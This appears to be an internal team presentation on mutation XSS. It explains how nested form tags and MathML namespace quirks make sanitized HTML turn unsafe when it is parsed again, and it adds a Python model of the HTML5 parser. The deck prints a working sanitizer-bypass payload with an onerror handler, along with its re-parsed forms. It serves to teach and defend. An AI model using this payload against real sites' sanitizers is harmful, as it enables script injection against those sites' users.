A presentation at Internal Team Session by Adithya Raj
Mutation XSS By Adithya Raj
Contents
1 Introduction
2 What is a sanitization library?
3 Namespaces
4 Mutation in Ammonia
5 Mutation using nested form tags
6 The fix!!!
Introduction
Everyone knows what XSS is and how much impact it holds. What if the user input is reflected into the DOM, but it is filtered? That's where mutation XSS comes into play. Mutation XSS happens when HTML that was safe is parsed into unsafe HTML because of quirks and bugs in browser parsing.
Let's check something, shall we. What will be the output of this HTML code? Will an alert pop up?
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
No, it won't pop up an alert.
Now how about the serialized HTML code of the previously parsed DOM ->
<form><math><mtext><form><mglyph><style></math><img src onerror=alert(1)></style></mglyph></form></mtext></math></form>
Wow, this pops up an alert!!! Yes, the second HTML code pops up an alert box, but WHY?? Before we ponder that question, let's look at some things that you should know.
What is a sanitization library?
How a DOM sanitization library like DOMPurify works: it takes the input HTML string and parses it into a DOM tree, it sanitizes that DOM tree (unsafe elements and attributes are removed), and then it serializes the DOM tree back to HTML markup. After that, the application puts the markup into the page (for example via div.innerHTML), so the browser parses it again into the document's DOM tree.
A sanitization library therefore follows this order: parsing ➡️ sanitizing ➡️ serializing. The assumption is that the serialized markup, when parsed again by the browser, gives back the same DOM tree the sanitizer saw, so everything the browser ends up with has been sanitized. That assumption does not always hold, and this is what leads to mutation XSS.
Namespaces
MathML text integration points: <mi> <mo> <mn> <ms> <mtext>
HTML integration points: <annotation-xml> <foreignObject> <desc> <title>
Exceptions inside MathML text integration points: <mglyph> <malignmark>
Mutation In Ammonia
Mutation using Form Tags
Payload:
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
Parsed and then serialized:
<form><math><mtext><form><mglyph><style></math><img src onerror=alert(1)></style></mglyph></form></mtext></math></form>
Nested <form>
<form id="first">inside form1 <form id="second"> inside form2
Mis-nested <form>
<form id="first">inside form1 <div></form> <form id="second"> inside form2
Now if the mis-nested forms are parsed and serialized again, it will give:
<form id="first">inside form1<div><form id="second">inside form2</form></div></form>
If that is parsed again, the second <form> is now nested inside the first, and it gives the following DOM tree.
Now let's look at the payload once again.
Payload:
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
Parsed and serialized:
<form><math><mtext><form><mglyph><style></math><img src onerror=alert(1)></style></mglyph></form></mtext></math></form>
Parsed again:
<form><math><mtext><mglyph><style></style></mglyph></mtext></math><img src onerror=alert(1)></form>
XSS!
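To make the three stages above (payload, parsed and serialized, parsed again) concrete, here is a small model of the HTML5 tree builder written for this page. It is an added example, not the deck's code and not DOMPurify's or Ammonia's, and it implements only the rules the slides lean on: the form element pointer (a nested <form> is ignored, and </form> only closes a form that is in scope), MathML text integration points with the <mglyph>/<malignmark> exception, raw-text HTML <style>, and innerHTML-style serialization. Everything else in the real algorithm (implied html/head/body, SVG, formatting elements, the breakout tags, entity decoding) is left out, the <body> root and all names (Node, parse, serialize, elements, round_trip_is_stable) are this example's own, and the SPECIAL, BOUNDARY and VOID tables are subsets of the spec's. Running the slide's payload through parse -> serialize -> parse shows the <img> turning from text inside an HTML <style> into a real HTML element, and round_trip_is_stable is the check a parse-sanitize-serialize pipeline silently depends on.

```python
# Added model of the HTML5 tree builder, written for this page; it is not the deck's code, nor DOMPurify's
# or Ammonia's. Only the rules the slides rely on are implemented; the rest of the algorithm is assumed away.
import re

HTML, MATH = "html", "math"
TEXT_INTEGRATION = {"mi", "mo", "mn", "ms", "mtext"}                   # MathML text integration points
BOUNDARY = {(MATH, n) for n in TEXT_INTEGRATION | {"annotation-xml"}} | {(HTML, n) for n in (
    "applet", "caption", "html", "table", "td", "th", "marquee", "object", "template")}  # end "in scope" walks
SPECIAL = TEXT_INTEGRATION | {"annotation-xml", "body", "div", "form", "head", "html", "p", "style", "table"}
VOID = {"br", "hr", "img", "input", "link", "meta"}                    # SPECIAL above: subset of the spec's
RAW_TEXT = {"iframe", "noembed", "noframes", "script", "style", "xmp"}
TOKEN = re.compile(r"<(/?)([A-Za-z][^\s/>]*)([^>]*)>|([^<]+)")
ATTR = re.compile(r"""([^\s=/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?""")

class Node:
    def __init__(self, name, ns, attrs=None, text=None):
        self.name, self.ns, self.attrs, self.text, self.children = name, ns, attrs or {}, text, []

def parse(html):
    body = Node("body", HTML)                   # synthetic root, as for body.innerHTML
    stack, form_ptr, pos = [body], None, 0
    def insert(name, ns, attrs=None, text=None):
        node = Node(name, ns, attrs, text)
        stack[-1].children.append(node)
        if text is None:                        # text nodes are leaves; elements stay open on the stack
            stack.append(node)
        return node
    def close(node):                            # pop the stack down to and including node
        del stack[stack.index(node):]
    def html_start(name, attrs):
        nonlocal form_ptr, pos
        if name == "form":
            if form_ptr is None:                # a <form> while another form is open is ignored
                form_ptr = insert(name, HTML, attrs)
            return
        insert(name, MATH if name == "math" else HTML, attrs)   # <math> switches namespace
        if name in RAW_TEXT:                    # HTML <style>: everything up to </style> is text, not markup
            m = re.compile(r"</%s\s*>" % name, re.I).search(html, pos)
            insert("#text", None, text=html[pos:(m.start() if m else len(html))])
            pos = m.end() if m else len(html)
        if name in VOID or name in RAW_TEXT:
            stack.pop()
    def html_end(name):
        nonlocal form_ptr
        if name == "form":                      # </form> works only when the form is "in scope"
            node, form_ptr = form_ptr, None
            if node is not None and next((n is node for n in reversed(stack)
                                          if n is node or (n.ns, n.name) in BOUNDARY), False):
                stack.remove(node)              # the form leaves the stack; an open <div> inside it stays
            return
        for node in reversed(stack):            # "any other end tag"
            if node.ns == HTML and node.name == name:
                return close(node)
            if node.name in SPECIAL:
                return
    def start_tag(name, attrs):
        cur = stack[-1]
        if cur.ns == HTML or (cur.name in TEXT_INTEGRATION and name not in ("mglyph", "malignmark")):
            html_start(name, attrs)             # HTML rules apply inside <mtext> too, except for these two tags
        else:
            insert(name, cur.ns, attrs)         # foreign content: the element inherits the current namespace
    def end_tag(name):
        if stack[-1].ns == HTML:
            return html_end(name)
        for node in reversed(stack):            # end tag seen in foreign content
            if node.ns != HTML and node.name == name:
                return close(node)
            if node.ns == HTML:
                return html_end(name)
    while pos < len(html):
        m = TOKEN.match(html, pos)
        pos = m.end() if m else pos + 1
        if m is None or m.group(4) is not None:
            insert("#text", None, text="<" if m is None else m.group(4))
        elif m.group(1):
            end_tag(m.group(2).lower())
        else:
            start_tag(m.group(2).lower(), {k.lower(): a or b or c for k, a, b, c in ATTR.findall(m.group(3))})
    return body

def serialize(node):                            # innerHTML-style; raw-text content is emitted unescaped
    out = []
    for child in node.children:
        if child.name == "#text":
            raw = node.ns == HTML and node.name in RAW_TEXT
            out.append(child.text if raw else child.text.replace("&", "&amp;").replace("<", "&lt;"))
        else:
            attrs = "".join(' %s="%s"' % (k, v.replace('"', "&quot;")) for k, v in child.attrs.items())
            end = "" if child.ns == HTML and child.name in VOID else serialize(child) + "</%s>" % child.name
            out.append("<%s%s>%s" % (child.name, attrs, end))
    return "".join(out)

def elements(node):                             # (name, namespace) of every element, depth first
    for child in (c for c in node.children if c.name != "#text"):
        yield child.name, child.ns
        yield from elements(child)

def round_trip_is_stable(html):                 # re-parsing the serialized markup must give the same tree
    once = serialize(parse(html))
    return once == serialize(parse(once))
```

Feeding the slide's payload in gives exactly the serialized string from the slide after one round, and after the second parse the tree contains an <img> in the HTML namespace next to a MathML <mglyph>, while the first parse had an HTML <mglyph> and no <img> element at all. The same functions reproduce the nested and mis-nested <form> behaviour from the earlier slide. A sanitizer cannot assume stability; it has to check the namespace an element actually lands in, or verify that its own output re-parses to the tree it sanitized.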
The Fix
References
https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/
https://research.securitum.com/helping-secure-dompurify-part-1/
https://research.securitum.com/dompurify-bypass-using-mxss/
https://cure53.de/fp170.pdf